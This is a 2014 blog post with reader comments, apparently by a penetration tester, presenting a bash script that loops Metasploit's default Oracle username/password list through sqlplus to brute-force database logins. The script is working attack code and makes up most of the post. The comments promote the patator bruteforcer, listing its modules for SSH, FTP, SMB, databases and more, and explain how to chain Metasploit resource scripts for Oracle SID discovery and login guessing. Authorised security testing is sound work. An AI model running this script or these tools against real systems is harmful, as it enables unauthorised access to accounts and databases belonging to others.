Friday, October 31, 2014

Quick and Dirty Oracle Brute Forcing

Here is a quick bash script that wraps sqlplus for some brute forcing, for when nmap is failing to get the job done for whatever reason (and therefore Metasploit is failing too, since its oracle_login module just calls nmap).

#!/bin/bash
# Username/password list, one entry per line, whitespace-separated fields
# in the order: comment number username password hash comment.
# Path is taken from the first argument (the original left INPUT undefined).
INPUT="${1:?usage: $0 <userpass-file>}"

[ ! -f "$INPUT" ] && { echo "$INPUT file not found"; exit 99; }
# Read the list on fd 3 so sqlplus keeps the terminal as its stdin;
# otherwise sqlplus would swallow the remaining lines of the list.
while read -r comment number username password hash rest <&3; do
    echo "string = $username:$password"
    # -L: try the login once instead of reprompting on failure
    /opt/oracle/instantclient_10_2/sqlplus -L "$username/$password@/ORCL"
done 3< "$INPUT"

What this does is take the default Oracle username/password list that ships with Metasploit, parse it line by line, and shove each username and password into the sqlplus command. If you guess one right, the script will hang with you logged in under the guessed account (sqlplus stays at its prompt).

Andriy said...

Hi, I really recommend checking out the patator bruteforcer:

* ftp_login : Brute-force FTP
* ssh_login : Brute-force SSH
* telnet_login : Brute-force Telnet
* smtp_login : Brute-force SMTP
* smtp_vrfy : Enumerate valid users using the SMTP VRFY command
* smtp_rcpt : Enumerate valid users using the SMTP RCPT TO command
* finger_lookup : Enumerate valid users using Finger
* http_fuzz : Brute-force HTTP/HTTPS
* pop_login : Brute-force POP
* pop_passd : Brute-force poppassd (not POP3)
* imap_login : Brute-force IMAP
* ldap_login : Brute-force LDAP
* smb_login : Brute-force SMB
* smb_lookupsid : Brute-force SMB SID-lookup
* rlogin_login : Brute-force rlogin
* vmauthd_login : Brute-force VMware Authentication Daemon
* mssql_login : Brute-force MSSQL
* oracle_login : Brute-force Oracle
* mysql_login : Brute-force MySQL
* mysql_query : Brute-force MySQL queries
* pgsql_login : Brute-force PostgreSQL
* vnc_login : Brute-force VNC
* dns_forward : Brute-force DNS
* dns_reverse : Brute-force DNS (reverse lookup subnets)
* snmp_login : Brute-force SNMPv1/2 and SNMPv3
* unzip_pass : Brute-force the password of encrypted ZIP files
* keystore_pass : Brute-force the password of Java keystore files
* umbraco_crack : Crack Umbraco HMAC-SHA1 password hashes

Anonymous said...

There are actually two oracle_logins for Metasploit, one that uses nmap and one that uses oci8. The rc scripts I wrote help with brute forcing a lot (run, with the db connected, scripts/resource/oracle_tns first, then oracle_sids, then oracle_login). Since submitting those, I made some modifications to them that allow you to set a global variable to define the networks/hosts to scan or otherwise filter things, but never bothered to push them as the submit process is kinda painful now.

Anonymous said...

The nmap Oracle brute force script library (tns.lua) has a bug. It tries to connect to Oracle using SERVICE_NAME; however, the input parameter is named SID.